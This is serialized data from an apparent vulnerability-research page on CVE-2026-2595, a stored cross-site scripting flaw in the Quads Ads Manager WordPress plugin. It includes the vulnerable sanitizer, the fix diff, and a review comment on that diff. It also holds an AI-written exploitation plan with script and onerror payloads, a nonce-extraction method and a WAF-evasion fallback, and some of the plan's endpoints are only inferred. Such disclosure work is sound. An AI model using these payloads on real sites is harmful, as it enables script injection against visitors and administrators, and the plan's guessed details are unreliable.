[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fBEXnjdMrXMpkK7DP6q3xbTGhVBNo6CBTD_fS9lLa12s":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-2595","quads-ads-manager-for-google-adsense-authenticated-contributor-stored-cross-site-scripting-via-multiple-ad-metadata-para","Quads Ads Manager for Google AdSense \u003C= 2.0.98.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Ad Metadata Parameters","The Quads Ads Manager for Google AdSense plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.98.1 due to insufficient input sanitization and output escaping of multiple ad metadata parameters. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","quick-adsense-reloaded",null,"\u003C=2.0.98.1","2.0.99","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-27 23:01:01","2026-03-28 11:26:35",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F99051b12-5a24-4108-9ea4-81f37a1c1b35?source=api-prod",1,[22,23,24,25,26,27,28],"admin\u002Fassets\u002Fjs\u002Fdist\u002Fadminscript.js","admin\u002Fassets\u002Fjs\u002Fdist\u002Fstyle.css","admin\u002Fassets\u002Fjs\u002Ffonts\u002Ficomoon.svg","admin\u002Fincludes\u002Fcommon-functions.php","admin\u002Fincludes\u002Fmigration-service.php","admin\u002Fincludes\u002Fmobile-detect.php","admin\u002Fincludes\u002Frest-api-service.php","researched",false,3,"This plan outlines the research and exploitation strategy for CVE-2026-2595, a Stored Cross-Site Scripting (XSS) vulnerability in the Quads Ads Manager plugin.\n\n### 1. Vulnerability Summary\nThe Quads Ads Manager plugin (slug: `quick-adsense-reloaded`) is vulnerable to Stored XSS because it fails to sanitize and escape multiple ad-related metadata parameters. Specifically, the function `quads_sanitize_post_meta()` in `admin\u002Fincludes\u002Fcommon-functions.php` explicitly bypasses sanitization for several keys, using only `wp_unslash()`. When these parameters (such as the ad `code`) are later rendered on the frontend or in the admin dashboard, arbitrary scripts can be executed.\n\n### 2. 
Attack Vector Analysis\n*   **Vulnerable Endpoint:** WordPress REST API or AJAX handlers used to save `quads-ads` Custom Post Type (CPT) metadata.\n*   **Vulnerable Parameters:** `visibility_include`, `visibility_exclude`, `targeting_include`, `targeting_exclude`, `code`, `random_ads_list`, and `ads_list`.\n*   **Authentication Level:** Contributor or above. Contributors can typically create and edit their own posts of allowed types.\n*   **Preconditions:** The `quads-ads` CPT must be editable by the attacker.\n\n### 3. Code Flow\n1.  **Entry Point:** An authenticated user (Contributor+) sends a request to save or update a `quads-ads` post.\n2.  **Processing:** The plugin processes the post metadata. In `admin\u002Fincludes\u002Fcommon-functions.php`, the `quads_sanitize_post_meta` function is called:\n    ```php\n    function quads_sanitize_post_meta($key, $meta){\n        switch ($key) {\n          case 'visibility_include':\n          case 'visibility_exclude':\n          case 'targeting_include':\n          case 'targeting_exclude':\n          case 'code':           \u002F\u002F \u003C--- Vulnerable: Ad Code\n          case 'random_ads_list':\n          case 'ads_list':\n            $response = wp_unslash($meta); \u002F\u002F No sanitization\n            break;\n          default:\n            $response = sanitize_text_field(wp_unslash($meta));\n            break;\n        }\n        return $response;\n    }\n    ```\n3.  **Storage:** The unsanitized input is stored in the `postmeta` table. Additionally, `QUADS_Ad_Migration::quadsUpdateOldAd` (in `admin\u002Fincludes\u002Fmigration-service.php`) may sync this data into the global `quads_settings` option.\n4.  **Sink:** The stored `code` (intended for AdSense scripts) is retrieved and echoed on the frontend via a shortcode or automatic ad placement without escaping.\n\n### 4. Nonce Acquisition Strategy\nThe plugin uses a nonce named `quads_ajax_nonce` for AJAX and likely standard REST cookies for API calls. 
To extract the required nonce:\n\n1.  **Identify Trigger:** The `quads-ads` management UI enqueues `admin\u002Fassets\u002Fjs\u002Fdist\u002Fadminscript.js`.\n2.  **Setup Page:** Create a page with a Quads shortcode to ensure scripts are enqueued.\n    *   `wp post create --post_type=page --post_status=publish --post_content='[quads id=\"1\"]'`\n3.  **Extract:** Navigate to the page or the admin dashboard as the Contributor.\n4.  **Variable Name:** Based on standard naming conventions and the bundle structure, look for `quads_ad_obj` or `quads_vars`.\n    *   `browser_eval(\"window.quads_ad_obj?.ajax_nonce\")` (inferred)\n    *   Alternatively, check for the nonce in the admin head: `browser_eval(\"document.querySelector('#quads_ajax_nonce')?.value\")`\n\n### 5. Exploitation Strategy\nWe will attempt to update the metadata of a `quads-ads` post via the REST API or the plugin's custom save action.\n\n**Step 1: Identify an Ad ID**\n*   List existing ads: `wp post list --post_type=quads-ads`\n*   If none exist, create one: `wp post create --post_type=quads-ads --post_title=\"XSS Ad\" --post_status=publish`\n\n**Step 2: Update Metadata (The Exploit)**\nUse `http_request` to send a POST request to the update endpoint. We will target the `code` parameter.\n\n*   **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fquads-ads\u002F{id}` (Standard REST) or `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action (if AJAX):** `quads_save_ad_settings` (inferred)\n*   **Payload:**\n    ```json\n    {\n      \"meta\": {\n        \"code\": \"\u003Cscript>alert('XSS_SUCCESS_CVE_2026_2595')\u003C\u002Fscript>\",\n        \"visibility_include\": \"all\"\n      }\n    }\n    ```\n*   **Headers:** `Content-Type: application\u002Fjson`, `X-WP-Nonce: [extracted_nonce]`\n\n**Step 3: Trigger Execution**\nVisit the frontend page where the ad is assigned or use a shortcode:\n*   `GET \u002F?p=[page_with_ad_id]`\n\n### 6. Test Data Setup\n1.  
**User:** `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2.  **Ad:** `wp post create --post_type=quads-ads --post_title=\"Vulnerable Ad\" --post_status=publish --post_author=[attacker_id]` (Note: Ensure the post ID is captured, e.g., `123`).\n3.  **Display Page:** `wp post create --post_type=page --post_title=\"Ad Display\" --post_content='[quads id=\"123\"]' --post_status=publish`\n\n### 7. Expected Results\n*   The `http_request` should return a `200 OK`.\n*   Navigating to the display page in the browser should trigger a JavaScript alert with the string `XSS_SUCCESS_CVE_2026_2595`.\n*   The raw source of the page should contain the unescaped `\u003Cscript>` tag within the ad container.\n\n### 8. Verification Steps (Post-Exploit)\n*   **Database Check:** `wp post meta get [ad_id] code`\n    *   Expected: `\u003Cscript>alert('XSS_SUCCESS_CVE_2026_2595')\u003C\u002Fscript>`\n*   **Global Settings Check:** `wp option get quads_settings`\n    *   Check if the payload has propagated to the serialized settings array.\n\n### 9. Alternative Approaches\nIf the standard REST API is restricted:\n1.  **AJAX Path:** Look for the `quads_save_ad` action in `admin\u002Fassets\u002Fjs\u002Fdist\u002Fadminscript.js`.\n2.  **Migration Sink:** If direct editing of `quads-ads` is blocked for Contributors, check if the \"Migration\" settings in the dashboard (if accessible) allow importing raw JSON data containing the payload.\n3.  **Parameter Variation:** If `code` is blocked by a WAF, use `visibility_include` with a payload like `\">\u003Cimg src=x onerror=alert(1)>`.","The Quads Ads Manager plugin is vulnerable to Stored Cross-Site Scripting (XSS) via multiple ad metadata parameters in versions up to 2.0.98.1. 
Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript into ad settings, which executes in the context of any user viewing the ad on the frontend or admin dashboard.","\u002F\u002F admin\u002Fincludes\u002Fcommon-functions.php:5\nfunction quads_sanitize_post_meta($key, $meta){\n\n    $response = null;\n\n    switch ($key) {\n\n      case 'visibility_include':\n      case 'visibility_exclude':\n\t\t\t$response = wp_unslash($meta);         \n        break;\n\n\t\tcase 'targeting_include':\n\t\tcase 'targeting_exclude':\n        $response = wp_unslash($meta);          \n\t\tbreak;\n\t\tcase 'code':\n\t\t\t$response = wp_unslash($meta);\n\t\tbreak;\n    case 'random_ads_list':\n\t\t\t$response = wp_unslash($meta); \n\t\tbreak; \n\t\tcase 'ads_list':\n\t\t\t$response = wp_unslash($meta);          \n\t\tbreak;\n      default:\n        $response = sanitize_text_field(wp_unslash($meta));\n        break;\n    }\n\n    return $response;\n    \n  }","--- admin\u002Fincludes\u002Fcommon-functions.php\n+++ admin\u002Fincludes\u002Fcommon-functions.php\n@@ -10,19 +10,19 @@\n \n       case 'visibility_include':\n       case 'visibility_exclude':\n-\t\t\t$response = wp_unslash($meta);         \n+            $response = map_deep(wp_unslash($meta), 'sanitize_text_field');\n         break;\n \n \t\tcase 'targeting_include':\n \t\tcase 'targeting_exclude':\n-        $response = wp_unslash($meta);          \n+        $response = map_deep(wp_unslash($meta), 'sanitize_text_field');\n \t\tbreak;\n \t\tcase 'code':\n-\t\t\t$response = wp_unslash($meta);\n+\t\t\t$response = wp_kses_post(wp_unslash($meta));\n \t\tbreak;\n     case 'random_ads_list':\n-\t\t\t$response = wp_unslash($meta); \n+\t\t\t$response = map_deep(wp_unslash($meta), 'sanitize_text_field');\n \t\tbreak; \n \t\tcase 'ads_list':\n-\t\t\t$response = wp_unslash($meta);          \n+\t\t\t$response = map_deep(wp_unslash($meta), 'sanitize_text_field');\n \t\tbreak;","The vulnerability is 
exploited by an authenticated attacker (minimum Contributor role) who can modify or create 'quads-ads' custom post types. The attacker sends a request to save ad metadata via the WordPress REST API or an AJAX handler. By including a malicious payload in parameters like 'code', 'visibility_include', or 'ads_list', the attacker bypasses the plugin's insufficient sanitization logic in `quads_sanitize_post_meta()`. The payload is stored in the database and subsequently executed when a site administrator or visitor views the injected ad (e.g., via the [quads] shortcode or automatic placement) because the plugin fails to escape the output.","gemini-3-flash-preview","2026-04-17 22:30:15","2026-04-17 22:31:02",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","2.0.98.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquick-adsense-reloaded\u002Ftags\u002F2.0.98.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-adsense-reloaded.2.0.98.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquick-adsense-reloaded\u002Ftags\u002F2.0.99","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-adsense-reloaded.2.0.99.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquick-adsense-reloaded\u002Ftags"]
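Review bot: in the `case 'code':` branch of the `common-functions.php` hunk, `wp_kses_post()` removes `<script>` elements, so ad markup that depends on script tags in `code` will be dropped silently on save. Confirm that is the intended behaviour for this field, or allow raw markup only for users holding a capability such as `unfiltered_html` and document the choice in a comment beside the case. All five changed branches sanitize at save time only, while the description attributes the issue to missing output escaping as well; values already stored by 2.0.98.1 and earlier are untouched by this hunk, so the code that echoes these meta values should also escape at render time. The `map_deep(wp_unslash($meta), 'sanitize_text_field')` lines handle array values correctly for the include/exclude and list keys.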